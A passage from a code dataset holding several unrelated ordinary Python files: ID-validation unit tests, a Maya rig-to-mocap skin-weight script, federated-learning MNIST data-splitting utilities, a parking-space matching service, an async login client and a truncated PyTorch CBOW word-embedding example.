Alexandre\"\n\nimport unittest\n\nfrom app.test.base import BaseTestCase\n\n# Import all functions to be tested\nfrom app.main.service.create_id_service import create_id, create_complete_id, input_is_valid, get_letter_by_total\n\n\n# Tests for function 'input_is_valid'\nclass TestInputValidator(BaseTestCase):\n def test_good_input(self):\n \"\"\" Test for checking good inputs \"\"\"\n good_input1 = \"123456789\"\n good_input2 = \"009999999\"\n self.assertEqual(input_is_valid(good_input1), True)\n self.assertEqual(input_is_valid(good_input2), True)\n\n def test_inputs_bad_length(self):\n \"\"\" Test for checking bad length inputs \"\"\"\n input_too_long = \"1234567890\"\n input_too_short = \"02345678\"\n input_empty = \"\"\n self.assertEqual(input_is_valid(input_too_long), False)\n self.assertEqual(input_is_valid(input_too_short), False)\n self.assertEqual(input_is_valid(input_empty), False)\n\n def test_input_with_other_char_than_numbers(self):\n \"\"\" Test for checking input with bad chars \"\"\"\n input_with_letter = \"12A456789\"\n input_with_special_char = \"1234567+9\"\n self.assertEqual(input_is_valid(input_with_letter), False)\n self.assertEqual(input_is_valid(input_with_special_char), False)\n\n def test_input_not_a_string(self):\n \"\"\" Test for checking input with bad var type \"\"\"\n id_integer = 174589632\n id_dictionary = {\"id\": \"123456789\"}\n id_list = [\"123456789\"]\n id_bool = True\n id_null = None\n self.assertEqual(input_is_valid(id_integer), False)\n self.assertEqual(input_is_valid(id_dictionary), False)\n self.assertEqual(input_is_valid(id_list), False)\n self.assertEqual(input_is_valid(id_bool), False)\n self.assertEqual(input_is_valid(id_null), False)\n\n\n# Tests for function 'create_complete_id' -- it can only have good inputs (verified before)\nclass TestCompleteIDCreator(BaseTestCase):\n def test_good_input(self):\n \"\"\" Test for checking good inputs \"\"\"\n input1 = \"123456789\"\n input2 = \"009999999\"\n self.assertEqual(create_complete_id(input1), \"J123456789\")\n self.assertEqual(create_complete_id(input2), \"Z009999999\")\n\n\n# Tests for function 'get_letter_by_total'\nclass TestGetLetterByTotal(BaseTestCase):\n def test_some_totals(self):\n \"\"\" Test with some totals \"\"\"\n total1 = 0\n total2 = 4\n total3 = 8\n self.assertEqual(get_letter_by_total(total1), \"Z\")\n self.assertEqual(get_letter_by_total(total2), \"D\")\n self.assertEqual(get_letter_by_total(total3), \"H\")\n\n\n# Tests for function 'create_id'\nclass TestIDCreator(BaseTestCase):\n good_response = {\n 'status': 'successfully finished',\n 'request': None,\n 'result': None\n }\n\n bad_response = {\n 'status': 'successfully finished - but input not valid format (9 numbers expected)',\n 'request': None,\n 'result': None\n }\n\n def test_good_input(self):\n \"\"\" Test for creating with good input \"\"\"\n response = self.good_response\n good_input1 = \"123456789\"\n good_input2 = \"009999999\"\n response[\"request\"] = good_input1\n response[\"result\"] = \"J123456789\"\n self.assertEqual(create_id(good_input1), response)\n response[\"request\"] = good_input2\n response[\"result\"] = \"Z009999999\"\n self.assertEqual(create_id(good_input2), response)\n\n def test_bad_input(self):\n \"\"\" Test for checking bad input - not good format \"\"\"\n response = self.bad_response\n bad_input1 = \"23456789\"\n bad_input2 = \"A02999999\"\n response[\"result\"] = \"null\"\n response[\"request\"] = bad_input1\n self.assertEqual(create_id(bad_input1), response)\n response[\"request\"] = bad_input2\n self.assertEqual(create_id(bad_input2), response)\n","sub_path":"app/test/testCreateIDService.py","file_name":"testCreateIDService.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"375950205","text":"# coding: utf-8\n#Author: rosa.w\n#Mail: wrx1844@qq.com\n#Computer language: Python.3.2.2\n#scriptName : SimpleRigToMocap.py\n#----------------------------------------------\n\n# Apr 06 | first write.\n\n#----------------------------------------------\n\nimport maya.cmds as mc\nimport maya.mel as mel\nimport os, sys\n\n\nclass srtm():\n\n def __init__(self):\n\n # upbody need edit weights.\n self.LUparmHoldJnt = 'L_uparm_sub01_jnt'\n self.LUparmAimJnt = ['L_uparm_sub02_jnt' , 'L_uparm_sub03_jnt' , 'L_uparm_sub04_jnt']\n\n self.LDnarmHoldJnt = 'L_lowarm_sub01_jnt'\n self.LDnarmAimJnt = ['L_lowarm_sub02_jnt' , 'L_lowarm_sub03_jnt' , 'L_lowarm_sub04_jnt']\n\n self.RUparmHoldJnt = 'R_uparm_sub01_jnt'\n self.RUparmAimJnt = ['R_uparm_sub02_jnt' , 'R_uparm_sub03_jnt' , 'R_uparm_sub04_jnt']\n\n self.RDnarmHoldJnt = 'R_lowarm_sub01_jnt'\n self.RDnarmAimJnt = ['R_lowarm_sub02_jnt' , 'R_lowarm_sub03_jnt' , 'R_lowarm_sub04_jnt']\n\n #dnbody need edit weights.\n self.LUplegHoldJnt = 'L_upleg_sub01_jnt'\n self.LUplegAimJnt = ['L_upleg_sub02_jnt' , 'L_upleg_sub03_jnt' , 'L_upleg_sub04_jnt']\n\n self.LDnlegHoldJnt = 'L_lowleg_sub01_jnt'\n self.LDnlegAimJnt = ['L_lowleg_sub02_jnt' , 'L_lowleg_sub03_jnt' , 'L_lowleg_sub04_jnt']\n\n self.RUplegHoldJnt = 'R_upleg_sub01_jnt'\n self.RUplegAimJnt = ['R_upleg_sub02_jnt' , 'R_upleg_sub03_jnt' , 'R_upleg_sub04_jnt']\n\n self.RDnlegHoldJnt = 'R_lowleg_sub01_jnt'\n self.RDnlegAimJnt = ['R_lowleg_sub02_jnt' , 'R_lowleg_sub03_jnt' , 'R_lowleg_sub04_jnt']\n\n #spline need edit weights.\n self.hipJnt = 'hip_jnt'\n self.chestJnt = 'chest_jnt'\n self.spineSkinGrp = 'clawgeoskinjnt_grp'\n self.mohipJnt = 'Hips'\n self.mochestJnt = 'Chest'\n\n def selectInfluencedPoints(self , queryJoint , mesh):\n # get joint influence points.\n affectedPoints=[]\n skinNode = self.searchSkinCluster(mesh)\n NodeSet = mc.listConnections( skinNode ,type='objectSet')\n pointList = mc.filterExpand(NodeSet , sm=(36,28,31,46))\n\n for c in pointList:\n value = mc.skinPercent(skinNode , c , t=queryJoint , q=True , v=True)\n if(value>0.0000):\n affectedPoints.append(c)\n\n return affectedPoints\n\n\n def searchSkinCluster(self , mesh):\n # get skincluster\n skinNode = mel.eval(\"findRelatedSkinCluster\" +\"(\\\"\"+ mesh +\"\\\")\")\n return skinNode\n\n\n def SetSkinWeight(self , mesh , holdJnt , aimJnt=[]):\n\n skinNode = self.searchSkinCluster(mesh)\n skinInfulence = mc.skinCluster(skinNode , query=True,inf=True)\n\n if holdJnt not in skinInfulence:\n pass\n else:\n for x in aimJnt:\n if x not in skinInfulence:\n pass\n else:\n mc.setAttr(x+'.liw' , 0)\n mc.select(mesh)\n mc.skinPercent( skinNode ,tv=[(holdJnt, 1.0)])\n mc.setAttr(x+'.liw' , 1)\n mc.select(cl=1)\n\n\n def CopyAndRename(self , obj , name):\n duplicate = mc.duplicate(obj)\n mc.select(duplicate[0],hi=1)\n sel = mc.ls(sl=1,fl=True)\n prefix = name\n\n newObj=[]\n for i in range(len(sel)):\n n =len(sel)- i-1\n temp = (sel[n].split('|'))[-1]\n newName = prefix+temp\n mc.rename(sel[n],newName)\n newObj.append(newName)\n\n root = mc.rename(newObj[-1],'%s%s'%(name,obj))\n newObj.remove(newObj[-1])\n newObj.append(root)\n newObj.reverse()\n return newObj\n\n\n def GenerateMocapMeshAndCopyOrgWeight(self ):\n orgMesh = mc.ls(sl=1)\n\n # create name\n name=''\n while name == '':\n result = mc.promptDialog(title='Charactor Name',message='Enter Name:',button=['OK', 'Cancel'],defaultButton='OK',cancelButton='Cancel',dismissString='Cancel')\n if result == 'OK':\n name = mc.promptDialog(query=True, text=True)+'_'\n\n # create mocap group.\n # get mocap skin joints.\n\n mocapMeshGrp = mc.createNode('transform' , name=name+'mocap_grp')\n mocapInfList = self.CopyAndRename(self.mohipJnt , name)\n mc.parent(mocapInfList[0] , mocapMeshGrp)\n\n #get waist skin joints.\n spineSkinJnt = mc.ls( self.spineSkinGrp , dag=1 , type='joint')\n waistJnt = [self.hipJnt]\n for x in spineSkinJnt:\n if 'waist' in x:\n waistJnt.append(x)\n waistJnt.append(self.chestJnt)\n\n #----------------progressing win\n progressWin = mc.window(title = \"create mocap rig\")\n mc.columnLayout(adj = True)\n\n if len(orgMesh)==1:\n pointsNum=1\n elif len(orgMesh)>1:\n pointsNum = len(orgMesh)-1\n\n progressControl = mc.progressBar(maxValue = pointsNum, width=300)\n mc.showWindow( progressWin )\n #---------------- progressing win\n\n for x in orgMesh:\n if mc.progressWindow( query=True, isCancelled=True ):\n break\n #get old mesh skincluster / old skin joints.\n oldskinNode = self.searchSkinCluster(x)\n oldInfulence = mc.skinCluster(oldskinNode,query=True,inf=True)\n\n #set new bridge mesh need skin joints / new mesh.\n newInfulence = oldInfulence\n newMesh = mc.duplicate(x, name=str(x)+'_mocapmodel')[0]\n mc.parent(newMesh , mocapMeshGrp)\n\n # skin the bridge mesh and copy skin weight from old mesh.\n mc.skinCluster(newInfulence , newMesh , tsb=True)\n mc.copySkinWeights(x , newMesh , noMirror=True , surfaceAssociation='closestPoint' , influenceAssociation='oneToOne')\n\n #locked all the joints skin weight.\n for j in newInfulence:\n mc.setAttr(j+'.liw' , 1)\n\n mc.select(cl=1)\n\n # edit skin weight about body twsit joints.\n self.SetSkinWeight( newMesh , self.LUparmHoldJnt , self.LUparmAimJnt)\n self.SetSkinWeight( newMesh , self.LDnarmHoldJnt , self.LDnarmAimJnt)\n self.SetSkinWeight( newMesh , self.RUparmHoldJnt , self.RUparmAimJnt)\n self.SetSkinWeight( newMesh , self.RDnarmHoldJnt , self.RDnarmAimJnt)\n\n self.SetSkinWeight( newMesh , self.LUplegHoldJnt , self.LUplegAimJnt)\n self.SetSkinWeight( newMesh , self.LDnlegHoldJnt , self.LDnlegAimJnt)\n self.SetSkinWeight( newMesh , self.RUplegHoldJnt , self.RUplegAimJnt)\n self.SetSkinWeight( newMesh , self.RDnlegHoldJnt , self.RDnlegAimJnt)\n\n # get spine holdjnt / aimJnt\n spineAimJnt = []\n spineHoldJnt=[]\n\n if len(spineSkinJnt) == len(waistJnt):\n pass\n else:\n #hold\n for i in range(0 , len(waistJnt) , 2):\n if i!=len(waistJnt)-1:\n spineHoldJnt.append(waistJnt[i])\n #aim\n for i in range(1 , len(waistJnt) , 2):\n spineAimJnt.append(waistJnt[i])\n\n #edit spine skin weight.\n for i in range( len(spineHoldJnt) ):\n self.SetSkinWeight( newMesh , spineHoldJnt[i] , aimJnt=[ spineAimJnt[i] ] )\n\n #set final mocap mesh ///\n #use the mocap skin joints create skincluster\n\n mocapMesh = mc.duplicate(newMesh, name=str(x)+'_mocapMesh')[0]\n mc.skinCluster(mocapInfList , mocapMesh , tsb=True)\n mc.copySkinWeights(newMesh , mocapMesh , noMirror=True , surfaceAssociation='closestPoint' , influenceAssociation='closestJoint')\n mc.delete(newMesh)\n\n mc.progressBar(progressControl, edit=True, step=1)\n mc.deleteUI(progressWin)\n\n\n","sub_path":"rosa_Checker/RosaCmds/Tools/rosa_SimpleRigToMocap.py","file_name":"rosa_SimpleRigToMocap.py","file_ext":"py","file_size_in_byte":9512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"568514779","text":"import torch\nimport torchvision\nfrom torchvision import transforms, datasets\nfrom torch.utils.data.dataset import Dataset\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n# 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\nclass_names = ['0', '1', '2', '3', '4',\n '5', '6', '7', '8', '9']\nglobal_data_name = \"none\"\n\ndef plot_random_figure(train_loader):\n dataiter = iter(train_loader)\n images, labels = dataiter.next()\n\n # creat grid of images\n img_grid = torchvision.utils.make_grid(images[0])\n\n # show images & labels\n matplotlib_imshow(img_grid)\n print(class_names[labels[0]])\n\n\ndef matplotlib_imshow(img):\n img = img.mean(dim=0)\n img = img / 2 + 0.5 # unnormalize\n npimg = img.numpy()\n plt.imshow(npimg, cmap=\"Greys\")\n plt.show()\n\n\ndef load_dataset(data_name):\n\n if data_name == \"MNIST\":\n print(\"MNIST\")\n train_set = torchvision.datasets.MNIST(\n root='../../data/MNIST',\n train=True,\n download=True\n )\n\n test_set = torchvision.datasets.MNIST(\n root='../../data/MNIST',\n train=False,\n download=True,\n )\n else:\n print(\"FashionMNIST\")\n train_set = torchvision.datasets.FashionMNIST(\n root='../../data/FashionMNIST',\n train=True,\n download=True\n )\n\n test_set = torchvision.datasets.FashionMNIST(\n root='../../data/FashionMNIST',\n train=False,\n download=True,\n )\n\n x_train, y_train = train_set.train_data.numpy().reshape(-1, 1, 28, 28) / 255, np.array(train_set.train_labels)\n x_test, y_test = test_set.test_data.numpy().reshape(-1, 1, 28, 28) / 255, np.array(test_set.test_labels)\n\n return x_train, y_train, x_test, y_test\n\n\ndef split_image_data(data, labels, n_clients=10, classes_per_client=10, shuffle=True, verbose=True, balancedness=None):\n '''\n Splits (data, labels) evenly among 'n_clients s.t. every client holds 'classes_per_client\n different labels\n data : [n_data x shape]\n labels : [n_data (x 1)] from 0 to n_labels\n '''\n\n # constants\n n_data = data.shape[0]\n n_labels = np.max(labels) + 1\n\n # if balancedness >= 1.0:\n data_per_client = [n_data // n_clients] * n_clients\n data_per_client_per_class = [data_per_client[0] // classes_per_client] * n_clients\n # data_per_client = [n_data] * n_clients\n print(data_per_client, data_per_client_per_class)\n\n # else:\n # fracs = balancedness ** np.linspace(0, n_clients - 1, n_clients)\n # fracs /= np.sum(fracs)\n # fracs = 0.1 / n_clients + (1 - 0.1) * fracs\n # data_per_client = [np.floor(frac * n_data).astype('int') for frac in fracs]\n #\n # data_per_client = data_per_client[::-1]\n #\n # data_per_client_per_class = [np.maximum(1, nd // classes_per_client) for nd in data_per_client]\n\n # if sum(data_per_client) > n_data:\n # print(\"Impossible Split\")\n # exit()\n\n # sort for labels\n data_idcs = [[] for i in range(n_labels)]\n for j, label in enumerate(labels):\n data_idcs[label] += [j]\n if shuffle:\n for idcs in data_idcs:\n np.random.shuffle(idcs)\n\n # split data among clients\n clients_split = []\n c = 0\n for i in range(n_clients):\n client_idcs = []\n budget = data_per_client[i]\n c = np.random.randint(n_labels)\n while budget > 0:\n take = min(data_per_client_per_class[i], len(data_idcs[c]), budget)\n\n client_idcs += data_idcs[c][:take]\n data_idcs[c] = data_idcs[c][take:]\n\n budget -= take\n c = (c + 1) % n_labels\n\n clients_split += [(data[client_idcs], labels[client_idcs])]\n\n def print_split(clients_split):\n print(\"Data split:\")\n for i, client in enumerate(clients_split):\n split = np.sum(client[1].reshape(1, -1) == np.arange(n_labels).reshape(-1, 1), axis=1)\n print(\" - Client {}: {}\".format(i, split))\n print()\n\n if verbose:\n print_split(clients_split)\n\n return clients_split\n\n\ndef split_image_data_customize(data, labels, n_clients=10, class_distribution=None, shuffle=True, verbose=True):\n if len(class_distribution) != n_clients:\n print(\"Invalid distribution\")\n exit()\n\n # constants\n n_data = data.shape[0]\n n_labels = np.max(labels) + 1\n\n data_idcs = [[] for i in range(n_labels)]\n for j, label in enumerate(labels):\n data_idcs[label] += [j]\n if shuffle:\n for idcs in data_idcs:\n np.random.shuffle(idcs)\n\n clients_split = []\n c = 0\n for i in range(n_clients):\n client_idcs = []\n\n for c in range(len(class_distribution[i])):\n take = class_distribution[i][c]\n client_idcs += data_idcs[c][:take]\n\n clients_split += [(data[client_idcs], labels[client_idcs])]\n\n def print_split(clients_split):\n print(\"Data split:\")\n for i, client in enumerate(clients_split):\n split = np.sum(client[1].reshape(1, -1) == np.arange(n_labels).reshape(-1, 1), axis=1)\n print(\" - Client {}: {}\".format(i, split))\n print()\n\n if verbose:\n print_split(clients_split)\n\n return clients_split\n\n\nclass CustomImageDataset(Dataset):\n '''\n A custom Dataset class for images\n inputs : numpy array [n_data x shape]\n labels : numpy array [n_data (x 1)]\n '''\n\n def __init__(self, inputs, labels, transforms=None):\n assert inputs.shape[0] == labels.shape[0]\n self.inputs = torch.Tensor(inputs)\n self.labels = torch.Tensor(labels).long()\n self.transforms = transforms\n\n def __getitem__(self, index):\n img, label = self.inputs[index], self.labels[index]\n\n if self.transforms is not None:\n img = self.transforms(img)\n\n return (img, label)\n\n def __len__(self):\n return self.inputs.shape[0]\n\n\ndef get_loader(transform, batch_size, worker_number, class_per):\n\n x_train, y_train, x_test, y_test = load_dataset()\n\n split = split_image_data(x_train, y_train, n_clients=worker_number,\n classes_per_client=class_per, verbose=True)\n\n client_loaders = [torch.utils.data.DataLoader(CustomImageDataset(x, y, transform),\n batch_size=batch_size, shuffle=True) for x, y in split]\n\n test_loader = torch.utils.data.DataLoader(CustomImageDataset(x_test, y_test, transform), batch_size=batch_size,\n shuffle=True)\n plot_random_figure(client_loaders[0])\n return client_loaders, test_loader\n\n\ndef get_loader_customize(data_name, transform, batch_size, worker_number, class_dist):\n\n x_train, y_train, x_test, y_test = load_dataset(data_name)\n\n split = split_image_data_customize(x_train, y_train, n_clients=worker_number,\n class_distribution=class_dist,\n shuffle=True,\n verbose=True)\n\n client_loaders = [torch.utils.data.DataLoader(CustomImageDataset(x, y, transform),\n batch_size=batch_size, shuffle=True) for x, y in split]\n\n test_loader = torch.utils.data.DataLoader(CustomImageDataset(x_test, y_test, transform), batch_size=batch_size,\n shuffle=True)\n # plot_random_figure(client_loaders[0])\n return client_loaders, test_loader","sub_path":"src/utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":7624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"313914206","text":"from clay import config\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom tornado.gen import coroutine, Return\n\nfrom ParkingFinder.base.errors import BaseError, NotFound, InvalidEntity, InvalidArguments\nfrom ParkingFinder.base.errors import Timeout\nfrom ParkingFinder.base.with_repeat import with_repeat\nfrom ParkingFinder.repositories import (\n AvailableParkingSpacePool,\n MatchedParkingList,\n ParkingLotRepository,\n WaitingUserPool,\n)\nfrom ParkingFinder.entities.matched_parking_space import MatchedParkingSpace\nfrom ParkingFinder.services.real_time_location_service import RealTimeLocationService\n\nlogger = config.get_logger('service.user_request')\n\nawaiting_matching_time_out = config.get('matching.matching_timeout')\nawaiting_matching_duration = config.get('matching.matching_duration')\nawaiting_matching_repeat_times = config.get('matching.matching_repeat_count')\nawaiting_action_time_out = config.get('matching.awaiting_action_timeout')\nawaiting_action_duration = config.get('matching.awaiting_action_duration')\nawaiting_action_repeat_times = config.get('matching.awaiting_action_repeat_count')\n\n# now available_parking_space has longi lati loc and plate return available_space_list enough\n# use pop_many instead of read_many\n# insert -> exception, read-> notFoundException, update-> # of rows affected, remove -> none -> remove fail\n\n\nclass NoResultFoundInMatchedSpaceTable(BaseError):\n error = \"No Result found In Matched Space Table\"\n\n\nclass CanNotStopForwardingMessage(BaseError):\n error = \"Can Not Forwarding Message\"\n\n\nclass UserRequestService(object):\n\n @classmethod\n @coroutine\n def request_parking_space(cls, waiting_user):\n \"\"\"\n service that handles user's parking space request\n\n :param: cached_space_list: list of previous user-rejected parking_plate_number\n :param: waiting_user: user entity\n :raise: Timeout: no space is available in a specific time so return timeout\n :raise InvalidArgument: means user terminates further service\n :raise InvalidEntity: the user passed in is not valid\n :return: List\n \"\"\"\n # branch to handle fetching list of available spaces\n logger.info({\n 'message': 'request parking space',\n 'waiting user': waiting_user\n })\n space_return = []\n try:\n user_info = yield WaitingUserPool.read_one(user_id=waiting_user.user_id)\n # TODO if user exist, update user geographical location\n try:\n space_return = yield cls._loop_checking_space_availability(user_id=waiting_user.user_id)\n except Timeout:\n pass\n except NoResultFound:\n try:\n inserted_user = yield WaitingUserPool.insert(waiting_user=waiting_user)\n except IntegrityError:\n raise InvalidEntity\n try:\n space_return = yield cls._checking_space_availability(waiting_user=waiting_user)\n except Timeout:\n pass\n\n # branch to handle if user continue to use the service\n try:\n # case where user continue the service\n\n user_info = yield WaitingUserPool.read_one(user_id=waiting_user.user_id)\n if not space_return:\n raise Timeout\n raise Return(space_return)\n except NoResultFound:\n # case where user stop the service\n for space in space_return:\n yield MatchedParkingList.update(\n user_id=waiting_user.user_id,\n plate=space.plate,\n status='rejected'\n )\n raise InvalidArguments\n\n @classmethod\n @coroutine\n def accept_parking_space(cls, user_id, accepted_space_plate):\n \"\"\"\n service that handles user's accepting parking case\n :param: str user_id:\n :param: accepted_space_plates: can be one or null. if it is null it means user rejects\n all the spaces we provide\n :raise: TimeOut: use didn't make choice in a specific time range\n :raise: InvalidEntity: this means information among tables is not consistent\n possibly internal error\n :raise: InvalidArgument: this means user terminate the service in the half way\n :return: ParkingSpace: matched parking space\n \"\"\"\n\n try:\n list_of_matching_space = yield MatchedParkingList.read_many(user_id=user_id)\n if not list_of_matching_space:\n raise NoResultFound\n # loop to change the corresponding status in the table\n for matched_result in list_of_matching_space:\n if accepted_space_plate != matched_result.plate:\n _status = 'rejected'\n elif matched_result.is_expired:\n _status = 'expired'\n else:\n _status = 'reserved'\n\n modified_row = yield MatchedParkingList.update(\n user_id=user_id,\n plate=matched_result.plate,\n status=_status\n )\n if modified_row == 0:\n raise InvalidEntity\n elif _status == 'expired':\n raise Timeout\n\n removed = yield WaitingUserPool.remove(user_id=user_id)\n # case where user is not valid so we should mark that space as reject\n # and not return the token\n if not removed:\n yield MatchedParkingList.update(\n user_id=user_id,\n plate=accepted_space_plate,\n status='rejected'\n )\n raise InvalidArguments\n else:\n parking_space = yield ParkingLotRepository.read_one(plate=accepted_space_plate)\n raise Return(parking_space)\n\n except NoResultFound:\n raise Timeout\n\n @classmethod\n @coroutine\n def reject_all_parking(cls, waiting_user):\n \"\"\"\n service that handles user's rejecting parking case\n this function will either throw a exception or return a nonempty list\n :param WaitingUser waiting_user:\n :raise Timeout : means currently none of spaces can be found\n :raise InvalidArgument: means user terminates further service\n :raise InvalidEntity : this means information among tables is not consistent\n possibly internal error\n :return: list\n \"\"\"\n\n try:\n list_of_matching_space = yield MatchedParkingList.read_many(user_id=waiting_user.user_id)\n for matched_result in list_of_matching_space:\n modified_row = yield MatchedParkingList.update(user_id=waiting_user.user_id,\n plate=matched_result.plate,\n status='rejected')\n if modified_row == 0:\n raise InvalidEntity\n # we also assume provide service first and then terminate if necessary to avoid inconsistency\n except NoResultFound:\n pass\n\n space_return = []\n try:\n space_return = yield cls._checking_space_availability(waiting_user=waiting_user)\n except Timeout:\n pass\n\n try:\n # case where user continue using the service\n user_existed = yield WaitingUserPool.read_one(user_id=waiting_user.user_id)\n if not space_return:\n raise Timeout\n raise Return(space_return)\n except NoResultFound:\n # case where user stop the service\n for space in space_return:\n modified_row = yield MatchedParkingList.update(user_id=waiting_user.user_id,\n plate=space.plate,\n status='rejected')\n if modified_row == 0:\n raise InvalidEntity\n raise InvalidArguments\n\n @classmethod\n @coroutine\n def fetching_space_nearby(cls, latitude, longitude, location):\n \"\"\"\n fetch the space that is near the location\n :param latitude:\n :param longitude:\n :param location\n :raise NNoResultFound\n :return: List\n \"\"\"\n # you can only use read_many here since you don't want change the status of the space in table\n list_of_available_space = yield AvailableParkingSpacePool.read_many(\n latitude=latitude,\n longitude=longitude,\n location=location\n )\n if not list_of_available_space:\n raise NoResultFound\n raise Return(list_of_available_space)\n\n @classmethod\n @with_repeat(\n repeat_exceptions=NoResultFoundInMatchedSpaceTable,\n repeat_times=awaiting_matching_repeat_times,\n timeout=awaiting_matching_time_out,\n duration=awaiting_matching_duration,\n )\n @coroutine\n def _loop_checking_space_availability(cls, user_id):\n \"\"\"\n *** matched_parking_space_table == pre_reserved_table *****\n checking if there are spaces that are assigned to user in the\n matched_parking_space_table only and the result of this function will never\n return a empty list. Either timeout exception(in this case empty list) or\n list with spaces\n :param str user_id: this function only accept user that is\n marked as \"active \"in the user waiting pool\n :raise Timeout\n :raise: InvalidEntity : this means information among tables is not consistent\n possibly internal error\n :return: list\n \"\"\"\n list_of_matched_space = yield MatchedParkingList.read_many(user_id=user_id)\n if not list_of_matched_space:\n logger.info({\n 'message': 'no available parking spaces',\n 'user_id': user_id,\n })\n\n raise NoResultFoundInMatchedSpaceTable\n\n spaces_return = []\n for matching_space in list_of_matched_space:\n if matching_space.is_awaiting:\n try:\n space = yield AvailableParkingSpacePool.read_one(plate=matching_space.plate)\n spaces_return.append(space)\n except NoResultFound:\n raise InvalidEntity\n if not spaces_return:\n logger.info({\n 'message': 'no available parking spaces',\n 'user_id': user_id,\n })\n raise NoResultFoundInMatchedSpaceTable\n else:\n raise Return(spaces_return)\n\n @classmethod\n @coroutine\n def _checking_space_availability(cls, waiting_user):\n \"\"\"\n this function will first check the available available parking space pool\n if none is available then this will call the\n loop_checking_space_availability to find space by looping\n :param WaitingUser waiting_user: this function only accept user that is \n marked as \"inactive \" in the user waiting pool \n and possibly mark the user as \"active\" in the half \n way in order to call the \n loop_checking_space_availability. Inside logic has\n enforced the consistency\n :raise Timeout\n :raise InvalidEntity : this means information among tables is not consistent\n possibly internal error\n :return: list\n \"\"\"\n # TODO: read_many API might change based on how the location value stored in each entity \n # TODO: so parameter might change accordingly\n try:\n location = waiting_user.location\n list_of_available_space = yield AvailableParkingSpacePool.pop_many(\n latitude=location.latitude,\n longitude=location.longitude,\n location=location.location\n )\n if not list_of_available_space:\n yield WaitingUserPool.update(\n user_id=waiting_user.user_id, is_active=True)\n\n spaces_return = yield cls._loop_checking_space_availability(waiting_user.user_id)\n raise Return(spaces_return)\n else:\n\n spaces_return = list_of_available_space\n for space_element in list_of_available_space:\n # insert matched result in the Pre_reserved table and mark status as awaiting\n modified = yield MatchedParkingList.insert(\n MatchedParkingSpace({\n 'plate': space_element.plate,\n 'user_id': waiting_user.user_id,\n 'status': 'awaiting',\n })\n )\n raise Return(spaces_return)\n except IntegrityError:\n raise InvalidEntity\n\n\n @classmethod\n @coroutine\n def service_terminate(cls, user_id):\n \"\"\"\n terminate the user service as requested\n :param str user_id:\n :raise CanNotStopForwardingMessage: this means either it is too late to terminate the service or\n there is a inconsistency exist in the table, possibly internal error\n :return:\n \"\"\"\n removed = yield WaitingUserPool.remove(user_id=user_id)\n if not removed:\n raise CanNotStopForwardingMessage\n\n\n\n\n\n\n","sub_path":"ParkingFinder/services/user_request.py","file_name":"user_request.py","file_ext":"py","file_size_in_byte":13858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"232397619","text":"import aiohttp\nimport os\n\n\nurlEnv = os.getenv(\n 'URLENVLOGIN',\n 'https://smartvit-user-dev.herokuapp.com/login'\n)\n\n\nasync def fetch(session, url, data=None):\n header = {\n 'Accept': 'application/json'\n }\n async with session.post(\n url,\n json=data,\n headers=header\n ) as response:\n return await response.json(), response.status\n\n\nasync def post_login(user):\n response = dict()\n status = 404\n\n async with aiohttp.ClientSession() as session:\n response, status = await fetch(\n session,\n urlEnv,\n user\n )\n\n return response, status\n","sub_path":"src/controllers/login_controller.py","file_name":"login_controller.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"246468201","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nimport numpy as np\r\nimport time\r\n\r\n\r\ntorch.manual_seed(1)\r\n\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\nCONTEXT_SIZE = 5 # 2 words to the left, 2 to the right\r\nEMBED_DIM = 5\r\nEPOCH = 3000\r\n\r\nraw_text = \"\"\"We are about to study the idea of a computational process.\r\nComputational processes are abstract beings that inhabit computers.\r\nAs they evolve, processes manipulate other abstract things called dat5\r\nThe evolution of a process is directed by a pattern of rules\r\ncalled a program. People create programs to direct processes. In effect,\r\nwe conjure the spirits of the computer with our spells.\"\"\".split()\r\n\r\n\r\n# By deriving a set from `raw_text`, we deduplicate the array\r\nvocab = set(raw_text)\r\nvocab_size = len(vocab)\r\n\r\n\r\nword_to_ix = {word: i for i, word in enumerate(vocab)}\r\ndata = []\r\nfor i in range(2, len(raw_text) - 2):\r\n context = [raw_text[i - 2], raw_text[i - 1],\r\n raw_text[i + 1], raw_text[i + 2]]\r\n target = raw_text[i]\r\n data.append((context, target))\r\n\r\n\r\nclass CBOW(nn.Module):\r\n\r\n\r\n def __init__(self):\r\n super(CBOW, self).__init__()\r\n self.embed_dim = EMBED_DIM\r\n self.context_size = CONTEXT_SIZE\r\n self.embeddings = nn.Embedding(vocab_size, self.embed_dim)\r\n self.lc = nn.Linear(self.embed_dim, vocab_size, bias=False)\r\n \r\n\r\n def forward(self, inputs):\r\n embeds = self.embeddings(inputs.to(device))\r\n output = embeds.mean(dim=0)\r\n output = self.lc(output)\r\n\r\n return output\r\n\r\n\r\n# create your model and train. here are some functions to help you make\r\n# the data ready for use by your module\r\n\r\n\r\ndef make_context_vector(context, word_to_ix):\r\n idxs = [word_to_ix[w] for w in context]\r\n context_vector = torch.tensor(idxs, dtype=torch.long)\r\n return context_vector\r\n\r\n\r\nmake_context_vector(data[0][0], word_to_ix) # example\r\n\r\nloss_func = nn.CrossEntropyLoss()\r\nnet = CBOW()\r\nnet.to(device)\r\noptimizer = optim.Adam(net.parameters(), lr=0.016, betas=(0.99, 0.999), eps=1e-08, weight_decay=0, amsgrad=True)\r\n\r\n#for param in net.parameters():\r\n# print(param)\r\nstart = time.time()\r\n\r\nfor epoch in range(EPOCH):\r\n loss_total = 0\r\n for context, target in data:\r\n context_inx = make_context_vector(context, word_to_ix)\r\n net.zero_grad()\r\n similarity = net(context_inx)\r\n loss = loss_func(similarity.view(1,-1), 